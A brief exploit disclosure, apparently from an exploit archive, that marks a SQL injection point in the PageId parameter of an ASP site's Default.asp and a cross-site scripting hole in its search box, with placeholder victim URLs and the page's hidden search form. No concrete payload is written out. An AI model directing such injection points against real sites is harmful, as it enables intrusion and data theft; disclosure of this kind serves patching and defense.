PoC/Exploit: ~~~~~~~~~~ ~ [PoC] ~: /website_path/Default.asp?sType=0&PageId=[Sqli] ~ [PoC]Http://[victim]/path/Default.asp?sType=0&PageId=[Sqli] Enter In Search Box XSS Code ~ <FORM action="Default.asp?PageId=-1" method=POST id=searchFORM name=searchFORM style="margin:0;padding:0"> <INPUT type="hidden" value="" name="txtSEARCH"> </FORM> ~ [PoC] ~: Http://[victim]/path/Default.asp Note: There are vulnerabilities in the search field that you can use
评论关闭。